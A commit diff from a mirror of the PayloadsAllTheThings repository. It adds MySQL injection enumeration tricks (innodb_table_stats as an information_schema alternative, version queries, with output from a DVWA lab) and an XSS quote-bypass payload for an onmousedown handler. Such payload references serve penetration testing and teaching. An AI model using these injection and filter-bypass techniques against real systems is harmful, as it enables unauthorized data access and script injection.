mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Update SQL injection with Information.schema alternatives
This commit is contained in:
parent
c9e13fcc36
commit
23f00b55d5
@ -232,6 +232,50 @@ OR -> ||
|
|||||||
WHERE -> HAVING
|
WHERE -> HAVING
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Information_schema.tables Alternative
|
||||||
|
```
|
||||||
|
select * from mysql.innodb_table_stats;
|
||||||
|
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
||||||
|
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
|
||||||
|
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
||||||
|
| dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 |
|
||||||
|
| dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 |
|
||||||
|
...
|
||||||
|
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
||||||
|
|
||||||
|
mysql> show tables in dvwa;
|
||||||
|
+----------------+
|
||||||
|
| Tables_in_dvwa |
|
||||||
|
+----------------+
|
||||||
|
| guestbook |
|
||||||
|
| users |
|
||||||
|
+----------------+
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Version Alternative
|
||||||
|
```
|
||||||
|
mysql> select @@innodb_version;
|
||||||
|
+------------------+
|
||||||
|
| @@innodb_version |
|
||||||
|
+------------------+
|
||||||
|
| 5.6.31 |
|
||||||
|
+------------------+
|
||||||
|
|
||||||
|
mysql> select @@version;
|
||||||
|
+-------------------------+
|
||||||
|
| @@version |
|
||||||
|
+-------------------------+
|
||||||
|
| 5.6.31-0ubuntu0.15.10.1 |
|
||||||
|
+-------------------------+
|
||||||
|
|
||||||
|
mysql> mysql> select version();
|
||||||
|
+-------------------------+
|
||||||
|
| version() |
|
||||||
|
+-------------------------+
|
||||||
|
| 5.6.31-0ubuntu0.15.10.1 |
|
||||||
|
+-------------------------+
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
@ -239,6 +283,7 @@ WHERE -> HAVING
|
|||||||
* MySQL:
|
* MySQL:
|
||||||
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||||
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||||
|
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
||||||
* MSQQL:
|
* MSQQL:
|
||||||
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||||
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
|
@ -378,6 +378,13 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
|
|||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass quotes in mousedown event
|
||||||
|
```
|
||||||
|
<a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
|
||||||
|
|
||||||
|
You can bypass a single quote with ' in an on mousedown event handler
|
||||||
|
```
|
||||||
|
|
||||||
Bypass dot filter
|
Bypass dot filter
|
||||||
```
|
```
|
||||||
<script>window['alert'](document['domain'])<script>
|
<script>window['alert'](document['domain'])<script>
|
||||||
|
Loading…
Reference in New Issue
Block a user